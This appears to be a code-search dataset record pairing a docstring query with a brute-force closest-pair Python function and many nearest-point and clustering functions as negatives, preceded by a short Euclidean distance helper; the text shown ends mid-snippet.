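As a quick sanity check on the distance record above, the following self-contained sketch reproduces the documented function together with a usage example. The only deliberate changes are a non-shadowing accumulator name (total instead of sum) and ** in place of math.pow, neither of which changes the result.

import math


def distance_between(point_one, point_two):
    # Euclidean distance between two points of the same dimension.
    # Both arguments are equal-length sequences whose items can be
    # converted to float, e.g. ("1", "2") and (4, 6).
    total = 0.0
    for d1, d2 in zip(point_one, point_two):
        total += (float(d1) - float(d2)) ** 2
    return math.sqrt(total)


if __name__ == "__main__":
    print(distance_between((0, 0), (3, 4)))        # 5.0
    print(distance_between(("1", "2"), (4.0, 6)))  # 5.0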
Finds the closest points in a given list of Point objects. There are two for loops because I imagined the Point list this way. y > represents the rows x > represents the columns
def find_closest_points(points):
    closest_dist = float("inf")
    closest_points = None, None
    for y, point_one in enumerate(points):
        for x, point_two in enumerate(points):
            if x > y:
                dist = distance_between(point_one.points, point_two.points)
                if dist < closest_dist:
                    closest_dist = dist
                    closest_points = point_one, point_two
    return closest_points
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def closest_points(self, points, maxdist=None):\n return [self.closest_point(point, maxdist) for point in points]", "def closest_dist(x, y, x_list, y_list):\n points = np.array([x, y]).T\n points_list = np.array([x_list, y_list]).T\n\n dpt0 = points_list[:, 0] - points[:, 0, np.newaxis]\n dpt1 = points_list[:, 1] - points[:, 1, np.newaxis]\n\n return np.argmin((dpt0*dpt0 + dpt1*dpt1), axis=1)", "def bruteClosest(list_points):\n\n minimum = 0\n p1 = 0\n p2 = 0\n for i in list_points:\n for k in list_points:\n \n d = dist(i,k)\n if (d < minimum and d != 0) or minimum == 0:\n p1 = i\n p2 = k\n minimum = d\n return [p1, p2, minimum]", "def closest(point, points):\n pts = [(Point.distance(point, p), p) for p in points]\n pts.sort()\n return pts[0][1]", "def closest_point(point, points):\n return points[cdist([point], points).argmin()]", "def brute_closest_pair(points):\n n = len(points)\n min_distance = float(\"inf\")\n last_pair = None\n for i in range(n):\n for j in range(i+1, n):\n result = distance(points[i], points[j])\n if result < min_distance:\n min_distance = result\n last_pair = [points[i], points[j]]\n return last_pair", "def closest_points(point, points, nn=1):\n\n eu_dsts = point - points\n eu_dsts = np.sqrt((eu_dsts * eu_dsts).sum(axis=1))\n n_ids = np.argsort(eu_dsts)\n out_points = np.zeros(shape=(nn, 3))\n for i in range(nn):\n out_points[i] = points[n_ids[i], :]\n return out_points", "def closest_points_naive(self, x, y):\r\n # Running time: O(n ** 2)\r\n\r\n dist = []\r\n for i in range(len(x)):\r\n for j in range(i+1, len(x)):\r\n d = self.get_euclidean_distance(x[i], x[j], y[i], y[j])\r\n dist.append(d)\r\n \r\n return min(dist)", "def _linear_nearest_neighbour(all_points: list, pivot: tuple):\n best_dist = None\n nearest = None\n for point in all_points:\n dist = _distance(point, pivot)\n if best_dist is None or dist < best_dist:\n best_dist = dist\n nearest = point\n return best_dist, nearest", "def nearest_point(pt):\n nearest_point = None\n min_dist = float(\"inf\")\n for p in cur_points:\n dist = euclidean_dist(pt, p.to_tuple())\n if dist < min_dist:\n min_dist, nearest_point = dist, p\n\n return nearest_point.to_tuple()", "def nearest_line(city_points):\n closest = 10000\n nodes = None\n for item in linear_list:\n line = item[2]\n nearest = abs(line[1] * city_points[0] + line[0] * city_points[1] + line[2]) \\\n / math.sqrt(line[1] ** 2 + line[0] ** 2)\n x = get_x(line, city_points)\n y = get_y(line, city_points)\n x1 = get_node_points(item[0])[0]\n x2 = get_node_points(item[1])[0]\n y1 = get_node_points(item[0])[1]\n y2 = get_node_points(item[1])[1]\n\n if ((x <= x1) & (x >= x2)) | ((x >= x1) & (x <= x2)):\n if ((y <= y1) & (y >= y2)) | ((y >= y1) & (y <= y2)):\n if nearest < closest:\n closest = nearest\n nodes = (item[0], item[1], item[2])\n return nodes", "def _nearest(arrlist_1, arrlist_2):\n tree = KDTree(arrlist_1);\n pts = tree.query(arrlist_2)\n\n return tree.data[pts[1][pts[0].argmin()]]", "def get_nearest(src_points, candidates, k_neighbors=1):\r\n\r\n # Create tree from the candidate points. leaf-size só muda o processamento, e a métrica é a forma de cálculo, que no caso é a Great Circle Distances\r\n tree = BallTree(candidates, leaf_size=15, metric='haversine')\r\n\r\n # Find closest points and distances. 
K é a quantidade de pontos que queremos a dis^tanica e SRC points são os pontos\r\n distances, indices = tree.query(src_points, k=k_neighbors)\r\n\r\n # Transpose to get distances and indices into arrays\r\n distances = distances.transpose()\r\n indices = indices.transpose()\r\n\r\n # Get closest indices and distances (i.e. array at index 0)\r\n # note: for the second closest points, you would take index 1, etc.\r\n closest = indices[0]\r\n closest_dist = distances[0]\r\n\r\n # Return indices and distances\r\n return (closest, closest_dist)", "def get_nearest(src_points, candidates, k_neighbors=1):\n\n # Create tree from the candidate points\n tree = BallTree(candidates, leaf_size=15, metric='haversine')\n distances, indices = tree.query(src_points, k=k_neighbors)\n\n # Transpose to get distances and indices into arrays\n distances = distances.transpose()\n indices = indices.transpose()\n\n # Get closest indices and distances (i.e. array at index 0)\n # note: for the second closest points, you would take index 1, etc.\n closest = indices[0]\n closest_dist = distances[0]\n\n # Return indices and distances\n return closest, closest_dist", "def closest_object(geometries, point): \n min_dist, min_index = min((point.distance(geom), k) \n for (k, geom) in enumerate(geometries))\n \n return geometries[min_index], min_dist, min_index", "def nearest_points(self, lat, lon, npt=1):\n # Use sin of lat lon to handle periodic\n # and not worry about if we are in negative\n # degrees\n #shape is shape of lat/lon grid\n# dist = xu.hypot(xu.sin(xu.radians(self['lat'].values)) -\n# xu.sin(xu.radians(lat)),\\\n# xu.cos(xu.radians(self['lon'].values)) - \n# xu.cos(xu.radians(lon)))\n # ST I changed dist to this because commented dist wasn't working right- \n #it was finding points from halfway around the world before\n dist = self.distance_to_point(lat,lon)\n # Get indices of the flattened array\n nearest_raw = dist.argsort(axis=None)[:npt]\n flat_array = dist.flatten()\n distances = flat_array[nearest_raw]\n # Convert back to 2-d coords\n closey, closex = np.unravel_index(nearest_raw, self['lon'].shape)\n #return nearest\n return closey, closex, distances", "def _nearest_to_point(self, point):\n ptvertex = point.get_vertex(crs=self.crs)\n segments = zip(self.vertices.slice(0, -1), self.vertices.slice(1, 0))\n\n if isinstance(self.crs, CartesianCRS):\n func = _cvectorgeo.pt_nearest_planar\n def func(seg):\n return _cvectorgeo.pt_nearest_planar(ptvertex[0], ptvertex[1],\n seg[0][0], seg[0][1], seg[1][0], seg[1][1])\n else:\n fwd = self.crs.forward\n inv = self.crs.inverse\n def func(seg):\n return _cvectorgeo.pt_nearest_proj(fwd, inv, ptvertex,\n seg[0], seg[1], tol=0.01)\n\n point_dist = map(func, segments)\n min_point = None\n min_dist = -1.0\n for i, (point, dist) in enumerate(point_dist):\n if dist < min_dist or (i == 0):\n min_point = point\n min_dist = dist\n\n return min_dist, min_point", "def closest(self, x, y):\n pts = np.column_stack([self.x, self.y])\n # Transform data coordinates to pixel coordinates.\n pts = self.ax.transData.transform(pts)\n diff = pts - [x, y]\n dist = np.hypot(*diff.T)\n min_index = np.argmin(dist)\n return min_index, dist[min_index]", "def closest_point(self, point, maxdist=0.0):\n face, point = self.geometry.ClosestPoint(Rhino.Geometry.Point3d(*point), maxdist)\n return list(point)", "def get_k_closest_points(point, data, k, distance_metric):\n points_and_scores = []\n k_closest_points = []\n for item in data:\n item_score = distance_metric(point, item)\n 
points_and_scores.append([item, item_score])\n points_and_scores = sorted(points_and_scores, key = lambda item:(item[1], item[0].coords))\n for i in range(k):\n k_closest_points.append(points_and_scores[i][0])\n return k_closest_points", "def FindClosestNPoints(self, p_int, , vtkIdList):\n ...", "def closest(centroids,coordinates):\n tup = [(cen[0], haversine(coordinates,cen[1])) for cen in centroids]\n distance = min(tup, key = lambda x:x[1])\n return (distance[0],coordinates)", "def closest_point(a, b, p):\n ap = [p[0]-a[0], p[1]-a[1]]\n ab = [b[0]-a[0], b[1]-a[1]]\n mag = float(ab[0]**2 + ab[1]**2)\n proj = dot(ap, ab)\n if mag ==0 :\n dist = 0\n else:\n dist = proj / mag\n if dist < 0:\n return [a[0], a[1]]\n elif dist > 1:\n return [b[0], b[1]]\n else:\n return [a[0] + ab[0] * dist, a[1] + ab[1] * dist]", "def closest(self, x, y):\n if self.direction == 'horizontal':\n p_pts = np.array([\n self.ax.transData.transform((p, 0))[0] for p in self.positions\n ])\n dist = abs(p_pts - x)\n else:\n p_pts = np.array([\n self.ax.transData.transform((0, p))[1] for p in self.positions\n ])\n dist = abs(p_pts - y)\n index = np.argmin(dist)\n return index, dist[index]", "def get_closest_points_2d(P1, P2):\r\n\r\n A_1 = []\r\n A_2 = []\r\n\r\n for p1_id in range(0,len(P1)):\r\n d_i = 100000\r\n d_f = 0\r\n\r\n Point = []\r\n\r\n for p2_id in range(0,len(P2)):\r\n d_f = euclidean_distance_2(P1[p1_id],P2[p2_id])\r\n\r\n if d_f < d_i:\r\n Point = P2[p2_id]\r\n d_i = d_f\r\n\r\n A_1.append(Point)\r\n A_2.append(d_i)\r\n\r\n return A_1, A_2", "def brute_force(points):\n if len(points) == 2:\n return points[0], points[1], calc_distance(points[0], points[1])\n\n return min(((pair[0], pair[1], calc_distance(pair[0], pair[1]))\n for pair in combinations(points, 2)), key=pair_key)", "def find_nearest_neighbors(p, points, k=5):\n dist = np.zeros(points.shape[0])\n for i in range(len(dist)):\n dist[i] = distance(p, points[i])\n ind = np.argsort(dist)\n return ind[0:k]", "def FindClosestPoint(self, ):\n ...", "def nearest(coordinate, coordinate_list, limit=None):\r\n distances = []\r\n coordinate_lat=coordinate[0]\r\n coordinate_lon=coordinate[1]\r\n for c in coordinate_list:\r\n if len(c)==5:\r\n distances.append( (distance(coordinate_lat, coordinate_lon, c[3][0], c[3][1]), c))\r\n else:\r\n distances.append( (distance(coordinate_lat, coordinate_lon, c[0], c[1]), c)) \r\n distances.sort()\r\n if limit:\r\n return distances[:limit]\r\n return distances", "def test_find_closest_waypoints_nearest(self):\n planner = WaypointPlanner(make_example_base_waypoints())\n\n planner.position = Vector3(0, 0, 0)\n waypoints = planner.find_closest_waypoints(1)\n self.assertEqual(1, len(waypoints))\n self.assertEqual(0, waypoints[0].pose.pose.position.x)\n self.assertEqual(0, waypoints[0].pose.pose.position.y)\n self.assertEqual(0, waypoints[0].pose.pose.position.z)\n\n planner.position = Vector3(0.9, 0.9, 0)\n waypoints = planner.find_closest_waypoints(2)\n self.assertEqual(2, len(waypoints))\n self.assertEqual(1, waypoints[0].pose.pose.position.x)\n self.assertEqual(1, waypoints[0].pose.pose.position.y)\n self.assertEqual(2, waypoints[1].pose.pose.position.x)\n self.assertEqual(2, waypoints[1].pose.pose.position.y)\n\n # Check it wraps back around to the start.\n planner.position = Vector3(0.9, 0.9, 0)\n waypoints = planner.find_closest_waypoints(3)\n self.assertEqual(3, len(waypoints))\n self.assertEqual(1, waypoints[0].pose.pose.position.x)\n self.assertEqual(1, waypoints[0].pose.pose.position.y)\n self.assertEqual(2, 
waypoints[1].pose.pose.position.x)\n self.assertEqual(2, waypoints[1].pose.pose.position.y)\n self.assertEqual(0, waypoints[2].pose.pose.position.x)\n self.assertEqual(0, waypoints[2].pose.pose.position.y)", "def find_closest(distances, threshold):\n n = len(distances)\n person_1 = []\n person_2 = []\n d = []\n\n for i in range(n):\n for j in range(i+1, n):\n if distances[i][j] <= threshold:\n person_1.append(i)\n person_2.append(j)\n d.append(distances[i][j])\n\n return person_1, person_2, d", "def closest_point(\n self, points: Union[List[\"PointMixin\"], \"PointMixin\"]\n ) -> pd.Series:\n from ..core.distance import closest_point as cp\n\n # The following cast secures the typing\n self = cast(\"Flight\", self)\n\n if not isinstance(points, list):\n points = [points]\n\n return min(\n (cp(self.data, point) for point in points),\n key=attrgetter(\"distance\"),\n )", "def nearest(reference, locations):\n return [x[1] for x in distances(reference, locations)]", "def _nearest_point_index(points, point):\n distance = sys.float_info.max\n index = None\n for i, p in enumerate(points):\n temp = _vec_distance(p, point)\n if temp < distance:\n distance = temp\n index = i\n return index, distance", "def closest_points(self, entity: _entity_types) -> Tuple[Point3D, Point3D]:\n self_body = _union_entities(self.bodies)\n other_body = _union_entities(entity)\n\n occ1 = _create_component(root(), self_body, name=\"temp\")\n occ2 = _create_component(root(), other_body, name=\"temp\")\n\n try:\n result = app().measureManager.measureMinimumDistance(occ1.bRepBodies[0], occ2.bRepBodies[0])\n return result.positionOne, result.positionTwo\n finally:\n occ1.deleteMe()\n occ2.deleteMe()", "def closest_point(self, point, start_param=None, Ns=25):\n x, z = self.rotate_to_xz_plane(point)\n la = self._closest_point(x, z, start_param, Ns)\n return la", "def point_with_min_y(points):\n\n\tmin_idx = None\n\n\tfor a,coord in enumerate(points):\n\n\t\tif min_idx == None:\n\t\t\tmin_idx = a\n\t\t\tP0_Y = coord[1]\n\t\t\tP0_X = coord[0]\n\t\telif coord[1] < P0_Y:\n\t\t\t# look for the point with lowest y co-ordinate\n\t\t\tmin_idx = a\n\t\t\tP0_X = coord[0]\n\t\t\tP0_Y = coord[1]\n\t\telif (coord[1] == P0_Y) & (coord[0] < P0_X):\n\t\t\t# In-case of tie with lowest y co-ordinate\n\t\t\t# take one which is leftmost or lowest x \n\t\t\t# co-ordinate\n\t\t\tmin_idx = a\n\t\t\tP0_X = coord[0]\n\t\t\tP0_Y = coord[1]\n\n\n\treturn (P0_X,P0_Y)", "def find_nearest_spot(this_coord, coord_list, scale_z, scale_xy):\n closest_sed = np.inf\n closest_spot = 0\n for test_data in coord_list:\n test_spot_id = test_data[0]\n test_coords = (test_data[1:4])\n sed = sq_euc_distance(test_coords, this_coord, scale_z, scale_xy)\n if (sed < closest_sed):\n closest_sed = sed\n closest_spot = test_spot_id\n closest_spot_coords = test_coords\n return closest_spot, np.sqrt(closest_sed), closest_spot_coords", "def slow_closest_pair(cluster_list):\n closest_pair = (float('inf'), -1, -1)\n index_list = range(len(cluster_list))\n\n for point_u in index_list:\n for point_v in index_list:\n if point_u != point_v:\n closest_pair = min(closest_pair,\n pair_distance(cluster_list, point_u, point_v))\n return closest_pair", "def find_nearest(obs_lat, obs_lon, lats, lons):\n point1 = Point(obs_lon, obs_lat)\n dist = 999999999\n index_i, index_j = -1, -1\n for i in range(0, len(lats)):\n for j in range(0, len(lons)):\n point2 = Point(lons[j], lats[i])\n val = point1.distance(point2)\n if val < dist:\n index_i = i\n index_j = j\n dist = val\n return [index_i, 
index_j, dist]", "def get_closest_neighbours(atomlist, neighbours=2):\n print('atomlist', atomlist)\n neighbourlist = []\n for atom in atomlist:\n listline = [atom[0][0]]\n dists = []\n distsc = []\n for partner in atomlist:\n dists.append(np.linalg.norm(atom[1] - partner[1]))\n distsc.append(np.linalg.norm(atom[1] - partner[1]))\n dists.remove(min(dists))\n for _ in range(neighbours):\n if min(dists) < 2.5:\n listline.append(atomlist[distsc.index(min(dists))][0][0])\n dists.remove(min(dists))\n #listline.append(atomlist[distsc.index(min(dists))][0][0])\n neighbourlist.append(listline)\n return neighbourlist", "def find_closest(a, b):\n a = np.atleast_1d(np.array(a))\n b = np.atleast_1d(np.array(b))\n out = [np.argmin(abs(b - a1)) for a1 in a]\n return out", "def nearestNeighbours(xObs, xMod):\n\n\txObs=np.asarray(xObs)\n\txMod=np.asarray(xMod)\n\tkept=np.copy(xMod)\n\tLObs=len(xObs)\n\tLMod=len(xMod)\n\txObs=np.expand_dims(xObs, axis=1)\n\txMod=np.expand_dims(xMod, axis=1)\n\txObs=np.repeat(xObs, LMod, axis=1)\n\txMod=np.repeat(xMod, LObs, axis=1)\n\txMod=xMod.T\n\tdiffs=xObs-xMod\n\t#interesting point: the smallest point (the one you are looking for) will be\n\t#the point just before the first negative value in a row\n\t#this could be used in an alternative method much to your advantage\n\ttemp=np.greater(diffs,0)\n\taltered=temp*diffs + np.invert(temp)*(10**30)\n\tmins=altered.min(1)\t\n\tmins=np.expand_dims(mins, axis=1)\n\tmins=np.repeat(mins, LMod, axis=1)\n\tplaced=np.equal(mins, diffs)*np.repeat(np.expand_dims(np.arange(0,LMod), axis=1), LObs, axis=1).T\n\tplaced1=np.sum(placed, axis=1)\n\tclosest1=kept[placed1]\n\tplaced2=np.add(placed1,1)\n\t#below deals with the fringe case; when there is no model x value greater than\n\t#a specific observation x value \n\ttemp=np.where(placed2 > (len(kept)-1))\n\tplaced2[temp]=placed2[temp]-1\n\tclosest2=kept[placed]\n\t#print(\"-----------------\")\n\t#print(closest1, closest2)\n\treturn placed1, placed2, closest1", "def kclosestpoints(points, k):\n dist = {p : 0 for p in points}\n for point in points:\n dist[point] = point[0] ** 2 + point[1] ** 2\n dist = sorted(dist.items(), key=lambda x : x[1], reverse=False)\n return dist[:k]", "def find_all_nearest_neighbours(point_cloud:np.ndarray) -> np.ndarray:\n pass", "def find_nearest_neighbors(p, points, k):\n\timport numpy as np\n\tdistances = np.zeros(points.shape[0])\n\tfor i in range(len(distances)):\n\t\tdistances[i] = distance(p,points[i])\n\tind = np.argsort(distances)\n\treturn ind[0:k]", "def fast_closest_pair(cluster_list):\n # sort in nondecreasing order of horizontal (x) coordinates\n cluster_list.sort(key=lambda cluster: cluster.horiz_center())\n\n # n <-- length(P);\n len_cluster = len(cluster_list)\n\n # if n <= 3 then\n if len_cluster <= 3:\n # (d,i,j) <== SlowClosestPair(P);\n output_list = slow_closest_pair(cluster_list)\n else:\n # m <-- leftbracketwithouttop n/2 rightbracketwithouttop\n middle_index = int(math.floor(len_cluster/2))\n # Psub L <-- {pi: 0 <= i <= m-1}; Pr <--{pi: m <= i <= n-1}; // Psub L and Pr are also sorted\n # (dL, iL, jL) <-- FastClosestPair(PL);\n # (dr, ir, jr) <-- FastClosestPair(Pr);\n left_output_list = fast_closest_pair(cluster_list[0:middle_index])\n right_output_list = fast_closest_pair(cluster_list[middle_index: len_cluster])\n \n output_list = min(left_output_list, (right_output_list[0], right_output_list[1]+middle_index, right_output_list[2]+middle_index))\n mid = 
1/2.0*(cluster_list[middle_index-1].horiz_center()+cluster_list[middle_index].horiz_center())\n half_width = abs(cluster_list[-1].horiz_center()-cluster_list[0].horiz_center())\n output_list = min(output_list, closest_pair_strip(cluster_list, mid, half_width))\n\n return output_list", "def find_closest_pt(ref_lon, ref_lat, tlon, tlat):\n\n # compute great circle distance from location to model grid points\n dist = gc_dist(ref_lon, ref_lat, tlon, tlat)\n\n # find j index of closest grid point\n work = N.take(dist,N.argmin(dist,0),0).diagonal()\n jj = N.argsort(work)[0]\n\n # find i index of closest grid point\n work = N.take(dist,N.argmin(dist,1),1).diagonal()\n ii = N.argsort(work)[0]\n\n return ii, jj", "def slow_closest_pair(cluster_list):\n dist, idx1, idx2 = float(\"inf\"), -1, -1\n for idx_u in range(len(cluster_list)):\n for idx_v in range(len(cluster_list)):\n if idx_u != idx_v:\n dist_uv = pair_distance(cluster_list, idx_u, idx_v)\n dist, idx1, idx2 = min((dist, idx1, idx2), dist_uv)\n return (dist, idx1, idx2)", "def _get_closest(centers, features):\n pred_labels = []\n\n features = features\n for feature in features:\n distances = End2End._dist(centers, feature)\n pred_labels.append(distances.argmin().item())\n\n return np.array(pred_labels)", "def closest(self, x):\n # http://www.ahinson.com/algorithms_general/Sections/Geometry/PluckerLine.pdf\n # has different equation for moment, the negative\n\n x = arg.getvector(x, 3)\n\n lam = np.dot(x - self.pp, self.uw)\n p = self.point(lam) # is the closest point on the line\n d = np.linalg.norm( x - p)\n \n return namedtuple('closest', 'p d lam')(p, d, lam)", "def partner_find_closest(self, partners_data):\n distance = {}\n point = Point(self.lng, self.lat)\n for partner in partners_data:\n if 'coverageArea' in partner and 'coordinates' in partner['coverageArea']:\n for coordinates_array in partner['coverageArea']['coordinates']:\n for coordinates in coordinates_array:\n if partner['id'] in distance:\n dist = distance[partner['id']]\n dist.append(point.distance(Polygon(coordinates)))\n distance[partner['id']] = dist\n else:\n distance[partner['id']] = [point.distance(Polygon(coordinates))]\n key = min(distance, key=distance.get) if distance else None\n return next((partner for partner in partners_data if partner['id'] == key), None)", "def closest_point_to(self, x):\n x = np.array(x)\n v = self.p1 - self.p0\n b = self.p0 - x\n\n t = -np.dot(v, b) / np.dot(v, v)\n if (0 <= t <= 1):\n closest = t*(self.p1 - self.p0) + self.p0\n return closest\n else:\n if np.linalg.norm(x - self.p0) < np.linalg.norm(x - self.p1):\n return self.p0\n else:\n return self.p1", "def closest_coord(self, list, coord):\n\n closest = (0,0)\n second_closest = (0,0)\n for c in list:\n if self.distance(c, coord) < self.distance(closest, coord) and (c != coord):\n second_closest = closest\n closest = c\n #print(closest, coord)\n return (closest, second_closest)", "def assign_points(data_points, centers):\n assignments = []\n for point in data_points:\n shortest = 10000 # positive infinity\n shortest_index = 0\n for i in range(len(centers)):\n val = distance(point, centers[i])\n if val < shortest:\n shortest = val\n shortest_index = i\n assignments.append(shortest_index)\n return assignments", "def sort_points(point, cloud):\n minsq = [distance_point_point_sqrd(p, point) for p in cloud]\n return sorted(zip(minsq, cloud, range(len(cloud))), key=lambda x: x[0])", "def closest_point(p1: Vector3, p2: Vector3, p3: Vector3) -> Vector3:\n k = ((p2.y - p1.y) * (p3.x - p1.x) - 
(p2.x - p1.x) * (p3.y - p1.y)) / ((p2.y - p1.y) ** 2 + (p2.x - p1.x) ** 2)\n x4 = p3.x - k * (p2.y - p1.y)\n y4 = p3.y + k * (p2.x - p1.x)\n\n return Vector3(x4, y4, 0)", "def closestCentroids(self, points , centroids ):\n dists = scipy.spatial.distance.cdist(points,centroids)\n # 1 is dimension\n minIds = numpy.argmin(dists, 1)\n return minIds", "def find_closest(self, in_vector):\n proto_vectors = self.p_vectors\n closest = None\n position = ()\n closest_distance = 9999999\n for i in range(proto_vectors.shape[0]):\n for j in range(proto_vectors.shape[1]):\n distance = np.linalg.norm(in_vector - proto_vectors[i][j].p_vector)\n if distance < closest_distance:\n closest_distance = distance\n closest = proto_vectors[i][j]\n position = (i,j)\n return [position, closest]", "def getclosest_ij(lats,lons,latpt,lonpt):\n dist_lat = (lats-latpt)**2 # find squared distance of every point on grid\n dist_lon = (lons-lonpt)**2\n minindex_lat = dist_lat.argmin() # 1D index of minimum dist_sq element\n minindex_lon = dist_lon.argmin()\n return minindex_lat, minindex_lon # Get 2D index for latvals and lonvals arrays from 1D index", "def getclosest_ij(lats,lons,latpt,lonpt):\n dist_lat = (lats-latpt)**2 # find squared distance of every point on grid\n dist_lon = (lons-lonpt)**2\n minindex_lat = dist_lat.argmin() # 1D index of minimum dist_sq element\n minindex_lon = dist_lon.argmin()\n return minindex_lat, minindex_lon # Get 2D index for latvals and lonvals arrays from 1D index", "def FindBest(ax, x, npoints):\r\n\r\n # get size of data array (goes 0 to ndata-1)\r\n ndata = len(ax)\r\n\r\n # Find index of point closest to x\r\n iclosest = BSearch(ax,x)\r\n if (verbose): \r\n print 'looking for closest to x=',x\r\n print 'ax',ax\r\n print 'closest point at ',ax[iclosest],'iclosest=',iclosest\r\n \r\n # Get npoints points in each direction, and find distance \r\n # from x for each. 
\r\n # This will handle cases where point is at start or end of \r\n # data set, or where all closest points lie in one direction.\r\n imin = iclosest-npoints\r\n imax = iclosest+npoints\r\n # make sure imin and imax are in array range\r\n if (imin < 0): imin = 0\r\n if (imax >= ndata): imax = ndata-1\r\n ncandidates = imax-imin+1\r\n if (verbose):\r\n print 'imin,imax,ncandidates',imin,imax,ncandidates\r\n print 'candidate points:'\r\n print ' j,i,xdata[i],xdelta[j]:'\r\n xdelta = zeros(ncandidates,'d') # initialize array\r\n for i in range(imin,imax+1): # do i=imin,imax\r\n j = i-imin\r\n xdelta[j] = abs(ax[i]-x) # distance from x\r\n if (verbose): print ' ',j,i,ax[i],xdelta[j]\r\n \r\n # Sort points by xdelta, in ascending order\r\n ibest = IndexSort(xdelta)\r\n \r\n # Exclude closest point if it's actually the point we're searching for\r\n # (dr mayes requirement)\r\n npoints2 = npoints\r\n if (xdelta[ibest[0]] == 0.0):\r\n if (verbose): print 'excluding point with xdelta=0'\r\n # reduce number of available candidates by one\r\n ncandidates -=1\r\n # make sure we don't have more points than candidates\r\n npoints2 = ncandidates \r\n # shift candidates down by one\r\n for i in range(ncandidates): # do i=0,ncandidates-1\r\n ibest[i]=ibest[i+1]\r\n \r\n # trim the array down to the number of requested or available points\r\n# ibest.resize(npoints) # having trouble with this sometimes\r\n ibest = ibest[:npoints2]\r\n\r\n # adjust ibest array to correct range\r\n # note: at this point the first <npoints> is all we need\r\n# for i in range(npoints): # do i=0,npoints-1\r\n for i in range(npoints2): # do i=0,npoints-1\r\n ibest[i]=ibest[i]+imin\r\n \r\n if (verbose):\r\n print 'best points (sorted by xdelta):'\r\n print ' i,ibest,xdata,xdelta'\r\n# for i in range(npoints): # do i=0,npoints-1\r\n for i in range(npoints2): # do i=0,npoints-1\r\n print ' ',i,ibest[i],ax[ibest[i]],abs(x-ax[ibest[i]])\r\n \r\n return ibest", "def distances(points, l=2):\n distances = []\n while points:\n baseline = points.pop()\n distances.extend([distance(baseline, point, l) for point in points])\n return distances", "def furthest_right_point(list_of_points):\n return max(list_of_points, key = lambda pt: pt.getX())", "def test_k_nearest(self):\n L = range(100)\n L = [(i, i, i, i) for i in L]\n tree = KdTree(L)\n # remove distance, only keep points from the result\n items = lambda items: [x for (d, x) in items] \n assert items(tree.k_nearest((-1, -1), 1)) == [(0, 0, 0, 0)]\n assert items(tree.k_nearest((100, 100), 1)) == [(99, 99, 99, 99)]\n assert items(tree.k_nearest((50, 50), 1)) == [(50, 50, 50, 50)]\n assert items(tree.k_nearest((-1, -1), 2)) == [(0, 0, 0, 0),\n (1, 1, 1, 1)]", "def _assignment(points, Mu):\n # Calculate Distance matrix for the points to the given centroids Mu\n distance = [euclidian_distance([points, Mu[i]]) for i in Mu.keys()]\n closest = []\n # print(distance)\n # Get the closest centroid for every point using distance matrix\n for i in range(len(points[0])):\n _MIN, _INDEX = 10000, 100\n for j in range(len(Mu.keys())):\n # print(distance[j][i])\n if distance[j][i] < _MIN:\n _MIN = distance[j][i]\n _INDEX = j\n closest.append(_INDEX+1)\n return (closest)", "def get_surrounding_points(search_values, point_set):\n # http://stackoverflow.com/questions/2566412/find-nearest-value-in-numpy-array\n upper_indices = np.searchsorted(point_set, search_values, side=\"left\")\n n_points = len(point_set)\n n_search = len(search_values)\n neighbors = []\n for i in range(n_search):\n idx = 
upper_indices[i]\n val = search_values[i]\n if idx == 0:\n n = (point_set[0], point_set[0])\n elif idx == n_points:\n n = (point_set[-1], point_set[-1])\n else:\n n = (point_set[idx-1], point_set[idx])\n neighbors.append(n)\n\n return neighbors", "def closest_points(self, other):\n p0_other, p1_other = other.p0, other.p1\n\n # w = p1 - p0\n # v = p1_other - p0_other\n # s*w + p0 = t*v + p0_other\n\n w = self.p1 - self.p0\n v = p1_other - p0_other\n\n A = np.vstack((w,v)).T\n b = p0_other - self.p0\n\n #soln = np.linalg.solve(A, b)\n soln = np.linalg.pinv(A).dot(b)\n s, t = soln[0], -soln[1]\n\n return s*w + self.p0, t*v + p0_other", "def closest_centroid(x,centroids):\n\tK =len(centroids)\n\tN = len(x)\n\tDistance = np.zeros((N,K))\n\tfor j in range(K):\n\t\tmu = centroids[j]\n\t\tDistance[:,j] = np.linalg.norm(x-mu,axis=1)\n\tout = np.argmin(Distance,axis=1) \n\treturn out", "def _get_closest(self, x, y, clients):\n target = min(\n clients,\n key=lambda c: math.hypot(c.x - x, c.y - y),\n default=self.clients.current_client,\n )\n return target", "def minimum_distance(points_sorted_x, points_sorted_y, n):\n if n == 1:\n return 100000 # just return a big number\n elif n == 2:\n return euclidean_distance(points_sorted_x[0], points_sorted_x[1])\n elif n == 3:\n da = euclidean_distance(points_sorted_x[0], points_sorted_x[1])\n db = euclidean_distance(points_sorted_x[0], points_sorted_x[2])\n dc = euclidean_distance(points_sorted_x[1], points_sorted_x[2])\n return min(da, db, dc)\n\n m = floor(n/2)\n x_axis = (points_sorted_x[m - 1][0] + points_sorted_x[m][0]) / 2 # split the plane and solve each part separately.\n while points_sorted_x[m - 1][0] == points_sorted_x[m][0]:\n m += 1\n if m == n-1:\n break\n left_points_y_sorted = []\n right_points_y_sorted = []\n for point in points_sorted_y:\n if point[0] <= x_axis:\n left_points_y_sorted.append(point)\n else:\n right_points_y_sorted.append(point)\n\n d_left = minimum_distance(points_sorted_x[:m], left_points_y_sorted, m)\n d_right = minimum_distance(points_sorted_x[m:], right_points_y_sorted, n-m)\n d = np.min([d_left, d_right])\n strip_points, strip_size = strip(left_points_y_sorted, right_points_y_sorted, d, x_axis)\n for i in range(strip_size-1):\n for j in range(i+1, min(i+6, strip_size)): # check only up to the sixth point on the strip.\n d = min(d, euclidean_distance(strip_points[i], strip_points[j]))\n return d", "def _find_closest_shape_in_list(self, shapes, datum):\n closest_dist_yet = np.inf\n closest_shape = None\n for s in shapes:\n closest_point_data = s.find_closest_point_data(datum)\n if closest_point_data.distance < closest_dist_yet:\n closest_shape = s\n closest_dist_yet = closest_point_data.distance\n return closest_shape", "def find_nearest_DPRIPs (swrad,DPRIPs):\r\n s_pt = swrad.geometry\r\n new2d =[] \r\n for cood in s_pt: \r\n pt_2d = Point(cood.x,cood.y)\r\n new2d.append(pt_2d)\r\n s_pt = new2d\r\n ND_list = [] \r\n N_DPRIP = [] \r\n # for all DPRIPs \r\n for gp in zip(s_pt,DPRIPs):\r\n s = gp[0]\r\n DPRIP = gp[1]\r\n # Create empty list for storing distance \r\n all_dist = [] \r\n # check DPRIPs for each source \r\n for pt in DPRIP: \r\n if pt.type == \"MultiPoint\": \r\n split_pt = [(n.x, n.y) for n in pt]\r\n for spt in split_pt: \r\n npt = Point(spt)\r\n dist = npt.distance(s)\r\n all_dist.append(dist)\r\n else: \r\n dist = pt.distance(s)\r\n 